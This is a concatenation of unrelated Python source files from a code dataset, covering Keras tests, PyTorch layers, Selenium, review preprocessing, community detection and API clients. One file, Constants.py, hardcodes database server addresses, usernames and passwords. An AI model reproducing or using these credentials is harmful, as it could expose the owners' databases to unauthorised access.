functional_utils.find_nodes_by_inputs_and_outputs(output, x)\n\n with self.assertRaisesRegex(\n ValueError, 'Found input tensor cannot be reached'):\n functional_utils.find_nodes_by_inputs_and_outputs(unconnected_inputs,\n output)\n\n with self.assertRaisesRegex(\n ValueError, 'Found unvisited input tensors that are disconnected'):\n functional_utils.find_nodes_by_inputs_and_outputs(\n [inputs, unconnected_inputs], output)\n\n def testfind_nodes_by_inputs_and_outputs_with_complicated_network(self):\n input1 = input_layer_lib.Input((10,))\n input2 = input_layer_lib.Input((10,))\n input3 = input_layer_lib.Input((10,))\n unconnected_input = input_layer_lib.Input((10,))\n\n dense1 = layers.Dense(4, name='dense1')\n dense2 = layers.Dense(4, name='dense2')\n # dense1 are shared between input1 and input2\n a = dense1(input1)\n b = dense1(input2)\n\n c = layers.Add()([a, b])\n d = dense2(input3)\n e = layers.Add()([c, d])\n # There are 5 nodes (invoke of __call__) in the graph.\n\n nodes = functional_utils.find_nodes_by_inputs_and_outputs(input1, a)\n self.assertCountEqual(nodes, [a.node])\n\n nodes = functional_utils.find_nodes_by_inputs_and_outputs(input2, b)\n self.assertCountEqual(nodes, [b.node])\n\n nodes = functional_utils.find_nodes_by_inputs_and_outputs([input2, input1],\n c)\n # This should contains 2 dense call and 1 add\n self.assertCountEqual(nodes, [a.node, b.node, c.node])\n\n # Missing input3\n with self.assertRaisesRegex(\n ValueError, 'Found input tensor cannot be reached'):\n functional_utils.find_nodes_by_inputs_and_outputs([input1, input2], e)\n\n nodes = functional_utils.find_nodes_by_inputs_and_outputs(\n [input1, input2, input3], e)\n self.assertCountEqual(nodes, [a.node, b.node, c.node, d.node, e.node])\n\n # Make sure we can create from intermediate tensors\n nodes = functional_utils.find_nodes_by_inputs_and_outputs([a, b, input3], e)\n self.assertCountEqual(nodes, [c.node, d.node, e.node])\n # Also make sure we can add intermediate outputs\n nodes = functional_utils.find_nodes_by_inputs_and_outputs([a, b, input3],\n [d, e])\n self.assertCountEqual(nodes, [c.node, d.node, e.node])\n\n # input1 and 2 are not needed for computing d\n with self.assertRaisesRegex(\n ValueError, 'Found unvisited input tensors that are disconnected'):\n functional_utils.find_nodes_by_inputs_and_outputs(\n [input1, input2, input3], d)\n\n with self.assertRaisesRegex(\n ValueError, 'Found unvisited input tensors that are disconnected'):\n functional_utils.find_nodes_by_inputs_and_outputs(\n [a, b, input3, unconnected_input], [e, d, c])\n\n def test_build_model_from_intermediate_tensor(self):\n batch_size = 4\n inputs = input_layer_lib.Input(shape=(8,))\n layer1 = layers.Dense(32)\n layer2 = layers.Dense(16)\n x = layer1(inputs)\n y = layer2(x)\n cloned_inputs, cloned_outputs = functional_utils.clone_graph_nodes(x, y)\n # Make sure the inputs and outputs are cloned.\n self.assertIsNot(x, cloned_inputs)\n self.assertIsNot(y, cloned_outputs)\n # Make sure a new node is attached to layer2, which mimic y = layer2(x)\n self.assertLen(layer2.inbound_nodes, 2)\n\n model = models.Model(cloned_inputs, cloned_outputs)\n self.assertIsInstance(model, models.Model)\n\n model.compile('rmsprop', 'mse')\n model.fit(np.random.randn(batch_size, 32), np.random.randn(batch_size, 16))\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"keras/engine/functional_utils_test.py","file_name":"functional_utils_test.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"6441221","text":"import torch\nfrom torch import relu\nimport torch.nn as nn\n\n\nclass PixelShuffleUpsample(nn.Module):\n \"Upsample by `scale` from `ni` filters to `nf` (default `ni`), using `nn.PixelShuffle`, `icnr` init, and `weight_norm`.\"\n\n def __init__(self, in_channels: int, scale: int = 2, blur: bool = False):\n super().__init__()\n self.conv = nn.Conv2d(in_channels=in_channels,\n out_channels=4 * in_channels,\n kernel_size=(3, 3),\n stride=1,\n padding=(1, 1))\n self.pixel_shuffle = nn.PixelShuffle(scale)\n # Blurring over (h*w) kernel\n # \"Super-Resolution using Convolutional Neural Networks without Any Checkerboard Artifacts\"\n # - https://arxiv.org/abs/1806.02658\n self.blur = blur\n self.pad = nn.ReplicationPad2d((1, 0, 1, 0))\n self.avg_pool = nn.AvgPool2d(2, stride=1)\n\n def forward(self, x):\n x = self.conv(x)\n x = relu(x)\n x = self.pixel_shuffle(x)\n if self.blur:\n x = self.pad(x)\n x = self.avg_pool(x)\n return x\n\n\nif __name__ == '__main__':\n x = torch.rand((1, 128, 64, 64))\n print(x.shape)\n\n upsampler = PixelShuffleUpsample(in_channels=128, blur=True)\n print(upsampler(x).shape)\n","sub_path":"segmentation_models_pytorch/unet_plus/pixle_shuffle.py","file_name":"pixle_shuffle.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"626390062","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nclass By_class():\n def test_by(self):\n driver=webdriver.Firefox()\n print(\"Firefox opened successfully\")\n driver.maximize_window()\n url=\"https://letskodeit.teachable.com/pages/practice\"\n print(\"redirecting to\", url)\n driver.get(url)\n driver.maximize_window()\n by_id=driver.find_element(By.ID,\"name\")\n if by_id is not None:\n print(\"by_id found\")\n by_name=driver.find_element(By.NAME,\"show-hide\")\n if by_name is not None:\n print(\"by_name is found\")\n by_link_text=driver.find_element(By.LINK_TEXT,\"Login\")\n if by_link_text is not None:\n print(\"by_link_name is found\")\n by_partial_link_text=driver.find_element(By.PARTIAL_LINK_TEXT,\"Pract\")\n if by_partial_link_text is not None:\n print(\"by_partial_link_name is found\")\n by_xpath = driver.find_element(By.XPATH,\"//input[@id='name']\")\n if by_xpath is not None:\n print(\"xpath Found\")\n by_css = driver.find_element(By.CSS_SELECTOR,\"#displayed-text\")\n if by_css is not None:\n print(\"css_selector found\")\n by_class_name = driver.find_element(By.CLASS_NAME,\"displayed-class\")\n if by_class_name is not None:\n print(\"class_name Found\")\n by_tag_name = driver.find_element(By.TAG_NAME,\"h1\")\n if by_tag_name is not None:\n print(\"tag_name found\")\nb=By_class()\nb.test_by()\nprint(\"Code executed successfully\")","sub_path":"python-with-selenium/Selenium_concepts/webdriver/findBy_class.py","file_name":"findBy_class.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"235443690","text":"import csv\nfrom funcs import remove_space, remove_comma\nimport pandas as pd\n\n## 메뉴판 닷컴 전처리\ndef menupan_preprocessing(file_name):\n # file = 'menupan.csv'\n f = open('./' + file_name, 'r', encoding='utf-8-sig')\n f2 = open('menupan2.csv', 'w')\n contents = csv.reader(f) # 파일 읽기\n count = 0\n\n f2.write('식당이름' + ',' + '음식분류' + ',' + '주소' + ',' + 'URL' + ',' + '총평점' + ',' \n + '식당특징' + ',' + '영업시간' + ',' + '좌석개수' + ',' + '흡연여부' + ',' + '인터넷유무' + ',' \n + '주차유무' + ',' + '식당설명' + ',' + '리뷰' + ',' + '작성날짜' + ',' + '개별평점' + '\\n')\n for line in contents: # 파일 한 줄(행, row)씩 읽기\n count += 1\n if count == 1:\n continue\n date_data = line[13].split('\\n')\n score_data = line[14].split('\\n')\n reviews = line[12].split('@@\\n')\n for i in range(12):\n line[i] = remove_comma(line[i])\n\n for i in range(len(date_data)):\n reviews[i] = remove_comma(reviews[i])\n f2.write(line[0] + ',' + line[1] + ',' + line[2] + ',' + line[3] + ',' + line[4] + ',' \n + line[5] + ',' + line[6] + ',' + line[7] + ',' + line[8] + ',' + line[9] + ',' \n + line[10] + ',' + line[11] + ',' + reviews[i] + ',' + date_data[i] + ',' + score_data[i] + '\\n')\n\n f2.close()\n f.close()\n\n\n# 메뉴판닷컴 데이터 추출(식당이름, 주소, 리뷰추출, 데이터들을 dataframe 형태로 반환)\ndef menupan_data_extraction(file_name):\n df = pd.read_csv('./' + file_name)\n drop_columns = []\n remain_columns = ['식당이름', '주소', '리뷰']\n for c in df.columns:\n if c not in remain_columns:\n drop_columns.append(c)\n\n df.drop(drop_columns, axis='columns', inplace=True)\n return df\n\n\n# 다이닝코드 데이터 추출(식당이름, 주소, 리뷰추출, 데이터들을 dataframe 형태로 반환)\ndef diningcode_date_extraction(file_name):\n # file = './review_final.csv'\n df = pd.read_csv('./' + file_name)\n drop_columns = []\n remain_columns = ['식당이름', '주소', '리뷰']\n for c in df.columns:\n if c not in remain_columns:\n drop_columns.append(c)\n \n df.drop(drop_columns, axis='columns', inplace=True)\n return df\n\n\n# 트립어드바이저 데이터 추출(식당이름, 주소, 리뷰추출, 데이터들을 dataframe 형태로 반환)\ndef tripadvisor_date_extraction(file_name):\n # file = './review_final.csv'\n df = pd.read_csv('./' + file_name)\n drop_columns = []\n remain_columns = ['식당이름', '주소', '리뷰'] # 이 부분 수정 필요\n for c in df.columns:\n if c not in remain_columns:\n drop_columns.append(c)\n \n df.drop(drop_columns, axis='columns', inplace=True)\n #df = df[['Restaurant', 'Address', 'Review']] # 컬럼 순서 정렬\n #df = df.rename(columns={'Restaurant':'식당이름', 'Address':'주소', 'Review':'리뷰'}) # 컬럼 이름 변경\n return df\n\n\n# 망고플레이트 데이터 추출(식당이름, 주소, 리뷰추출, 데이터들을 dataframe 형태로 반환)\ndef mangoplate_data_extraction(file_name):\n df = pd.read_csv('./' + file_name)\n df = df.rename(columns={'RES_NAME':'식당이름', 'RES_ADDRESS':'주소', 'REV_COMMENT':'리뷰'}) # 컬럼 이름 변경\n drop_columns = []\n remain_columns = ['식당이름', '주소', '리뷰']\n for c in df.columns:\n if c not in remain_columns:\n drop_columns.append(c)\n \n df.drop(drop_columns, axis='columns', inplace=True)\n df = df[['식당이름', '주소', '리뷰']] # 컬럼 순서 정렬\n return df\n\n\n# 요기요 데이터 추출(식당이름, 주소, 리뷰추출, 데이터들을 dataframe 형태로 반환)\ndef yogiyo_data_extraction(file_name):\n df = pd.read_csv('./' + file_name)\n drop_columns = []\n remain_columns = ['Restaurant', 'Address', 'Review']\n for c in df.columns:\n if c not in remain_columns:\n drop_columns.append(c)\n \n df.drop(drop_columns, axis='columns', inplace=True)\n df = df[['Restaurant', 'Address', 'Review']] # 컬럼 순서 정렬\n df = df.rename(columns={'Restaurant':'식당이름', 'Address':'주소', 'Review':'리뷰'}) # 컬럼 이름 변경\n return df\n\n\n# 데이터 추출의 메인함수\ndef data_extraction(file_list, main_file):\n result = pd.read_csv('./' + main_file)\n df = pd.DateFrame() # file_list = [[name, type], []]\n for f, site_type in file_list:\n if site_type == 'yogiyo':\n df = yogiyo_data_extraction(f)\n elif site_type == 'mangoplate':\n df = mangoplate_data_extraction(f)\n elif site_type == 'tripadvisor':\n df = tripadvisor_date_extraction(f)\n elif site_type == 'diningcode':\n df = diningcode_date_extraction(f)\n elif site_type == 'menupan':\n df = menupan_data_extraction(f)\n result = pd.concat([result, df])\n \n result.to_csv('total_review.csv')\n merge_same_restaurant('total_review.csv')\n\n\n# 같은 식당끼리의 리뷰 데이터 통합\ndef merge_same_restaurant(file_name):\n df = pd.read_csv('./' + file_name)\n restaurants = df['식당이름'].unique()\n new_df = pd.DataFrame()\n for j, r in enumerate(restaurants):\n restaurant = df[df[r] == r] # 식당이름이 같은 식당들의 데이터에 접근\n reviews = []\n address = restaurant.iloc[0, 2]\n for i in range(len(restaurant)):\n review = restaurant.iloc[i, 3]\n reviews.append(review)\n new_df.loc[j] = [r, address, reviews]\n\n new_df.to_csv('merge_review.csv')\n\n\n\n\n\ndf = pd.read_csv('./data/review_final2.csv')\nrestaurants = df['식당이름'].unique()\nnew_df = pd.DataFrame(columns=['식당이름','주소','리뷰'])\nfor j, r in enumerate(restaurants):\n restaurant = df[df['식당이름'] == r] # 식당이름이 같은 식당들의 데이터에 접근\n reviews = []\n address = restaurant.iloc[0, 2]\n for i in range(len(restaurant)):\n review = restaurant.iloc[i, 3]\n reviews.append(review)\n new_df.loc[j] = {'식당이름': r, '주소': address, '리뷰': reviews}\n\nnew_df.to_csv('merge_review.csv')\n","sub_path":"preprocessing/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":6341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"595821065","text":"#!/usr/bin/env python\n# if not N x N will pad\nfrom __future__ import print_function\nimport argparse\nimport csv\nimport os\nimport numpy as np\nfrom cic_dis import cic_utils\nfrom cic_dis import cic_ms\nfrom cic_dis import cic_plot\nimport sys\n\ncsv.field_size_limit(sys.maxsize) # let's rock\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Characterize repeated runs \"\n \"of community structure recorded in CSV\")\n parser.add_argument('-i', '--input_csv',\n help='Input, CSV containing multiple runs of '\n 'modularity detection', required=True)\n parser.add_argument('-H', '--header',\n help='Include header info, typically used first write',\n action='store_true')\n parser.add_argument('-isl', '--inj_site_lst',\n help='Injection sites present in matrix',\n required=True,\n nargs=\"+\")\n parser.add_argument('-v', '--verbose',\n help='Print relevant but optional output',\n action='store_true')\n\n args = vars(parser.parse_args())\n\n input_csv_path = args['input_csv']\n assert os.path.isfile(input_csv_path),\\\n \"can't find input csv file {}\".format(input_csv_path)\n display_header = args['header']\n verbose = args['verbose']\n inj_site_lst = args['inj_site_lst']\n\n # parse input csv into louvain run arr dict, all values are strings\n # [ { 'run' : run\n # 'num_communities' : num_communities\n # 'q' : q,\n # 'gamma' : gamma # redundant but that's better than the alternative\n # 'community_structure' : community_structure_dict string}, ... ]\n\n if verbose:\n print(\"Reading Louvain output CSV\")\n import time\n start = time.time()\n louvain_run_arr_dict = cic_utils.read_louvain_run_arr_dict(input_csv_path)\n\n if verbose:\n print(\"done in {}s\".format(time.time()-start))\n\n if verbose:\n print(\"Converting format of read louvain run arr dict\")\n import time\n start = time.time()\n\n num_com_npa = np.array(\n [x['num_communities'] for x in louvain_run_arr_dict])\n q_npa = np.array([x['q'] for x in louvain_run_arr_dict])\n\n # make set of sets from each community_structure and tally count of each\n com_cnt_dict = {} # { community_structure_set_of_sets : count }\n cmt_str_lst_fs_fs = [] # community structure list, list\n roi_name_lst = []\n for run in louvain_run_arr_dict:\n if len(roi_name_lst) == 0:\n roi_name_lst = sorted(\n cic_utils.flatten(run['community_structure'].values()))\n\n cmt_str_lst = run['community_structure'].values()\n cmt_str_lst_fs_fs.append(cic_ms.lst_lst_to_fs_fs(cmt_str_lst))\n set_of_sets = frozenset([frozenset(x) for x in cmt_str_lst])\n cnt = com_cnt_dict.get(set_of_sets, 0)\n com_cnt_dict[set_of_sets] = cnt + 1\n\n if verbose:\n print(\"done in {}s\".format(time.time()-start))\n\n # calculate a bunch of metrics\n num_runs = len(louvain_run_arr_dict)\n q_max = np.max(q_npa)\n unique_cmt_str = len(com_cnt_dict.keys())\n cmt_str_cnt_npa = np.array([x for x in com_cnt_dict.values()])\n cmt_str_mode_count = np.max(cmt_str_cnt_npa)\n # multi-scale stuff\n res_dct = {}\n if verbose:\n print(\"calculating std_dev_w_alpha_beta...\")\n start = time.time()\n std_dev_w_alpha_beta = cic_ms.calc_std_w_alpha_beta(\n roi_name_lst=roi_name_lst, cmt_str_lst_fs_fs=cmt_str_lst_fs_fs,\n res_dct=res_dct)\n if verbose:\n print(\"done in {}s: {}\".format(\n time.time()-start,\n std_dev_w_alpha_beta)\n )\n\n if verbose:\n print(\"calculating mean_var_z_alpha_beta...\")\n start = time.time()\n mean_var = cic_ms.calc_mean_var_z_alpha_beta(\n roi_name_lst=roi_name_lst,\n std_w_alpha_beta=std_dev_w_alpha_beta,\n cmt_str_lst_fs_fs=cmt_str_lst_fs_fs,\n M=cic_ms.n_choose_2(len(cmt_str_lst_fs_fs)),\n res_dct=res_dct)\n if verbose:\n print(\"done in {}s: {}\".format(\n time.time()-start,\n mean_var)\n )\n\n qmax_cmt_str = []\n for run in louvain_run_arr_dict:\n if len(qmax_cmt_str) == 0 and run['q'] == q_max:\n qmax_cmt_str = sorted(run['community_structure'].values())\n\n # okay phew! now calculate consensus community structure\n if verbose:\n print(\"calculating cons_cmt_str...\")\n start = time.time()\n if std_dev_w_alpha_beta == 0 or mean_var == float('Inf'):\n if verbose:\n print(\"No st.dev, returning arbitrary cmt str as consensus\")\n cons_cmt_str = next(iter(cmt_str_lst_fs_fs))\n else:\n cons_cmt_str = cic_ms.calc_cons_cmt_str(\n roi_name_lst=roi_name_lst,\n cmt_str_lst_fs_fs=cmt_str_lst_fs_fs,\n gamma=louvain_run_arr_dict[0]['gamma'],\n runs=num_runs,\n tau=0.1)\n if verbose:\n print(\"done in {}s\".format(time.time()-start))\n\n assert len(louvain_run_arr_dict) > 0 # reasonable assumption i hope\n\n # create print dict to be written to csv as single row\n # note no cmt structure included due to size limitations\n print_dict = {}\n print_dict[(0, 'num runs')] = num_runs\n print_dict[(0.5, 'gamma')] = louvain_run_arr_dict[0]['gamma']\n print_dict[(0.6, 'mean part sim')] = mean_var[0]\n print_dict[(0.7, 'var part sim')] = mean_var[1]\n print_dict[(0.8, 'len con cmt str')] = len(cons_cmt_str)\n print_dict[(1, 'max num com')] = np.max(num_com_npa)\n print_dict[(2, 'mean num com')] = np.mean(num_com_npa)\n print_dict[(3, 'std dev num com')] = np.std(num_com_npa)\n print_dict[(4, 'max q')] = q_max\n print_dict[(5, 'mean q')] = np.mean(q_npa)\n print_dict[(6, 'std dev')] = np.std(q_npa)\n print_dict[(7, 'unique cmt str')] = \"{}/{}\".format(\n unique_cmt_str,\n num_runs)\n print_dict[(8, 'cmt str mode count')] = \"{}/{}\".\\\n format(cmt_str_mode_count.tolist(), num_runs)\n\n # write to std out in csv file format\n csvwriter = csv.writer(sys.stdout)\n\n if display_header:\n row = []\n for key in sorted(print_dict.keys()):\n row.append(key[1])\n csvwriter.writerow(row)\n\n row = []\n for key in sorted(print_dict.keys()):\n row.append(print_dict[key])\n csvwriter.writerow(row)\n\n # now write community structure values\n row = []\n row.append('consensus cmt str:')\n # convert to lst_lst to save space in csv\n cons_cmt_str_lst_lst = cic_ms.fs_fs_to_lst_lst(cons_cmt_str)\n row.append(cons_cmt_str_lst_lst)\n csvwriter.writerow(row)\n row = []\n row.append('consensus cmt inj sites:')\n cmt_inj_sites = cic_plot.cmt_inj_site_lst_from_cons_cmt_str(\n inj_site_lst,\n cons_cmt_str_lst_lst)\n row.append(cmt_inj_sites)\n csvwriter.writerow(row)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/char_cmt_str.py","file_name":"char_cmt_str.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"100952673","text":"t = int(input())\nfor _ in range(t):\n\tn = int(input())\n\tc = list(map(int,input().split()))\n\tidx = 0\n\tf = 0\n\tf2 = 0\n\tfor i in range(n):\n\t\tif(c[i]==1):\n\t\t\tidx = i\n\t\t\tbreak\n\n\tfor i in range(n):\n\t\tif(c[(idx+i)%n]!=i+1):\n\t\t\tf = 1\n\t\tif(c[idx-i]!=i+1):\n\t\t\tf2 = 1\n\tif f == 1 and f2 ==1:\n\t\tprint('NO')\n\telse:\n\t\tprint('YES')","sub_path":"codeforces/1203/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"353829059","text":"#!/usr/bin/env python\n\"\"\"cem_agent_env.py: testing cem agent.\n\"\"\"\n\n__author__ = \"Vinicius Guimaraes Goecks\"\n__copyright__ = \"TBD\"\n__credits__ = [\"TBD\", \"TBD\"]\n__license__ = \"TBD\"\n__version__ = \"0.0.0\"\n__maintainer__ = \"Vinicius Guimaraes Goecks\"\n__email__ = \"viniciusguigo@gmail.com\"\n__status__ = \"Prototype\"\n__date__ = \"September 25, 2016\"\n\n# import\nfrom cem_agent import ContinuousCEM, DiscreteCEM\nimport gym\nimport numpy as np\nfrom rotation_1dof import Rotation_1DOF_Env\n\n# initial and goal states\ninitial_state = np.array([0.,0.])\ngoal_state = np.array([.1,.1])\n\n# create env\n# env = gym.make(\"CartPole-v0\")\nenv = Rotation_1DOF_Env(initial_state, goal_state)\nenv.seed(0)\nnp.random.seed(0)\n\n# simulation parameters\nnum_episodes = 10\n\n# agent\nparams = dict(num_steps = 200, n_iter=20, batch_size=25, elite_frac = 0.2)\nagent = ContinuousCEM(env, **params)\n# agent = DiscreteCEM(env, **params)\nagent.fit() # train agent using batch rollouts\n\n# run episodes\nfor i in range(num_episodes):\n total_rew = 0\n ob = env.reset()\n\n # each step on episode\n for t in range(agent.num_steps):\n a = agent.act(ob)\n (ob, reward, done, _info) = env.step(a)\n total_rew += reward\n if done: break\n\n print('Episode %i, total_rew %f' %(i, total_rew))\n","sub_path":"test/test_cem/cem_agent_env.py","file_name":"cem_agent_env.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"190484678","text":"__author__ = 'htan'\n\nFORMAT = '%(asctime)-15s %(clientip)s %(user)-8s %(message)s'\nNum_Threads = 20\n\ndoclistfolder = \"D:/SECFiling/alldoclist/\"\n# docidlist =\"D:/SECFiling/8K/doclist.txt\"\ntenk_folder = \"D:/SECFiling/10K/raw\"\ntenk_text_folder = \"D:/SECFiling/10K/text\"\neightk_folder = \"D:/SECFiling/8K/raw/\"\ntenq_folder = \"D:/SECFiling/10Q/raw\"\ntenq_text_folder = \"D:/SECFiling/10Q/text\"\ntrscpt_folder = \"D:/SECFiling/transcripts/raw\"\ntrscpt_text_folder = \"D:/SECFiling/transcripts/text\"\ntrscpt_question_folder = \"D:/SECFiling/transcripts/questions\"\n# eightk_folder=\"C:/Users/htan/Desktop/badfiles/too empty/\"\ntest_size = 200\nInit8KItmes = \"data/8k items.txt\"\n#real SECDB server\n# sec_server = \"statestreet.cskg33esobcp.us-east-1.rds.amazonaws.com\"\n# sec_database = \"EDGAR2\"\n\n#testing SECDB server\nsec_server = \"34.206.10.85\"\nsec_database = \"EDGAR\"\nsec_uid = \"chicago\"\nsec_pwd = \"block37!\"\n\n\n\ndnn_server = \"dnndb02.cqciftmvisgw.us-west-2.rds.amazonaws.com\"\ndnn_database = \"DNN\"\ndnn_uid = \"admin\"\ndnn_pwd = \"520SState\"\n\ndbsource = \"dnn\"\n\n","sub_path":"Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"302990383","text":"#\n# datafiles\n#\n# References to the Chinese data files, including load/save functions\n# for char_dat.pkl.\n#\n\nimport os\nimport pickle\n\ndatapath = os.path.join(os.path.dirname(__file__), \"Datafiles\")\n\n\nSortDB = os.path.join(datapath, \"ch2sort.txt\")\nDictDB = os.path.join(datapath, \"xhc4_words.txt\")\nSortPickle = os.path.join(datapath, \"char_dat.pkl\")\n\n\ndef loadSortData(fname=SortPickle):\n pkl=file(fname, 'r')\n SortData = pickle.load(pkl)\n pkl.close()\n return SortData\n\ndef saveSortData(SortData, fname=SortPickle):\n pkl=file(fname,'w')\n pickle.dump(SortData, pkl)\n pkl.close()\n\n","sub_path":"flextools-2.2.1/FlexTools/Modules/Chinese/Lib/datafiles.py","file_name":"datafiles.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"248982702","text":"#It was used the API from the site https://sunrise-sunset.org/api\n#APP para acceder a la API de las horas de salida y puesta del sol\n\nimport requests\n\n\nurl = 'https://api.sunrise-sunset.org/json'\nlat = 42.2405864\nlong = -8.7208822\n\npayload = {\"lat\" : lat, \"lng\" : long}\n\njson_data = requests.get(url, params=payload).json()\n#print(json_data.url)\n\nif json_data['status'] == 'OK':\n\n sunrise = json_data['results']['sunrise']\n sunset = json_data['results']['sunset']\n\n print()\n print(\"La latitud es \" + str(lat) + \" y la longitud es \" + str(long), end=\".\\n\")\n print(\"El sol sale a las \" + str(sunrise) + \" y se pone a las \" + str(sunset), end=\".\\n\")\n\nelse:\n print(\"La solicitud no pudo completarse.\")","sub_path":"Python Code Emerging Technologies Workshop/sunsetSunrise.py","file_name":"sunsetSunrise.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"169009100","text":"import os\nimport re\nimport sys\nimport datetime\n\nimport requests\n\nfrom matroid import error\n\nBASE_URL = 'https://www.matroid.com/api/v1'\nDEFAULT_GRANT_TYPE = 'client_credentials'\n\ndef api_call(default_error):\n \"\"\"setup and teardown decorator for API calls\"\"\"\n def decorator(func):\n def setup_and_teardown(self, *original_args, **original_kwargs):\n self.retrieve_token()\n\n response = func(self, *original_args, **original_kwargs)\n\n try:\n self.check_errors(response, default_error)\n except error.TokenExpirationError:\n self.retrieve_token(options={'request_from_server': True})\n return func(self, *original_args, **original_kwargs)\n else:\n return self.format_response(response)\n return setup_and_teardown\n return decorator\n\n\nclass MatroidAPI(object):\n def __init__(self, base_url=BASE_URL, client_id=None, client_secret=None, options={}):\n \"\"\"\n base_url: the API endpoint\n client_id: OAuth public API key\n client_secret: OAuth private API key\n options (dict):\n set json_format to False to return API results as strings instead of objects\n set print_output to True to print the API results to the screen in addition to returning them\n set access_token with your auth token e.g., 43174a480adebf5b8e2bf39c0dcb53f1, to preload the token instead of requesting it from the server\n \"\"\"\n\n if not client_id:\n client_id = os.environ.get('MATROID_CLIENT_ID', None)\n\n if not client_secret:\n client_secret = os.environ.get('MATROID_CLIENT_SECRET', None)\n\n if not client_id or not client_secret:\n raise error.AuthorizationError(\n message='Both client_id and client_secret parameters are required')\n\n self.client_id = client_id\n self.client_secret = client_secret\n self.base_url = base_url\n self.token = None\n self.grant_type = DEFAULT_GRANT_TYPE\n self.json_format = options.get('json_format', True)\n self.print_output = options.get('print_output', False)\n self.filereader = self.FileReader()\n\n token = options.get('access_token')\n\n if token:\n token_type = 'Bearer'\n # if the token's lifetime is shorter than this, the client will request a refresh automatically\n lifetime_in_seconds = 7 * 24 * 60 * 60\n self.token = self.Token(token_type, token, lifetime_in_seconds)\n\n self.endpoints = {\n 'token': (self.base_url + '/oauth/token', 'POST'),\n 'detectors': (self.base_url + '/detectors/search', 'GET'),\n 'create_detector': (self.base_url + '/detectors', 'POST'),\n 'classify_image': (self.base_url + '/detectors/:key/classify_image', 'POST'),\n 'classify_video': (self.base_url + '/detectors/:key/classify_video', 'POST'),\n 'get_video_results': (self.base_url + '/videos/:key', 'GET'),\n 'register_stream': (self.base_url + '/streams', 'POST'),\n 'monitor_stream': (self.base_url + '/streams/:stream_id/monitor/:detector_id', 'POST'),\n 'train_detector': (self.base_url + '/detectors/:key/finalize', 'POST'),\n 'detector_info': (self.base_url + '/detectors/:key', 'GET'),\n 'account_info': (self.base_url + '/account', 'GET')\n }\n\n @api_call(error.InvalidQueryError)\n def list_detectors(self, **query):\n \"\"\"Lists the available detectors\"\"\"\n (endpoint, method) = self.endpoints['detectors']\n try:\n headers = {'Authorization': self.token.authorization_header()}\n params = {x: str(query[x]).lower() for x in query}\n return requests.request(method, endpoint, **{'headers': headers, 'params': params})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def classify_image(self, detector_id, image_file=None, image_url=None, **options):\n \"\"\"\n Classify an image with a detector\n\n detector_id: a unique id for the detector\n image_file: path to local image file to classify\n image_url: internet URL for the image to classify\n \"\"\"\n\n MAX_LOCAL_IMAGE_SIZE = 50 * 1024 * 1024\n MAX_LOCAL_IMAGE_BATCH_SIZE = 50 * 1024 * 1024\n\n def batch_file_classify(image_file):\n try:\n files = []\n total_batch_size = 0\n for file in image_file:\n file_obj = self.filereader.get_file(file)\n file_size = os.fstat(file_obj.fileno()).st_size\n\n if file_size > MAX_LOCAL_IMAGE_SIZE:\n raise error.InvalidQueryError(message='File %s is larger than the limit of %d megabytes' % (file_obj.name, self.bytes_to_mb(MAX_LOCAL_IMAGE_BATCH_SIZE)))\n\n files.append(('file', file_obj))\n total_batch_size += file_size\n\n if total_batch_size > MAX_LOCAL_IMAGE_BATCH_SIZE:\n raise error.InvalidQueryError(message='Max batch upload size is %d megabytes.' % (self.bytes_to_mb(MAX_LOCAL_IMAGE_BATCH_SIZE)))\n\n return requests.request(method, endpoint, **{'headers': headers, 'files': files, 'data': data})\n finally:\n for file_tuple in files:\n (key, file) = file_tuple\n file.close()\n\n (endpoint, method) = self.endpoints['classify_image']\n\n if not image_url and not image_file:\n raise error.InvalidQueryError(\n message='Missing required parameter: image_file or image_url')\n\n endpoint = endpoint.replace(':key', detector_id)\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n data = {'detector_id': detector_id}\n data.update(options)\n\n if image_url:\n data['url'] = image_url\n if image_file:\n if isinstance(image_file, list):\n return batch_file_classify(image_file)\n else:\n with self.filereader.get_file(image_file) as file_to_upload:\n files = {'file': file_to_upload}\n file_size = os.fstat(file_to_upload.fileno()).st_size\n\n if file_size > MAX_LOCAL_IMAGE_SIZE:\n raise error.InvalidQueryError(message='File %s is larger than the limit of %d megabytes' % (file_to_upload.name, self.bytes_to_mb(MAX_LOCAL_IMAGE_SIZE)))\n\n return requests.request(method, endpoint, **{'headers': headers, 'files': files, 'data': data})\n else:\n return requests.request(method, endpoint, **{'headers': headers, 'data': data})\n except IOError as e:\n raise e\n except error.InvalidQueryError as e:\n raise e\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n def retrieve_token(self, options={}):\n \"\"\"\n Generates an OAuth token. The API client will intelligently refresh the Access Token for you\n However, if you would like to manually expire an existing token and create a new token,\n call this method manually and pass in 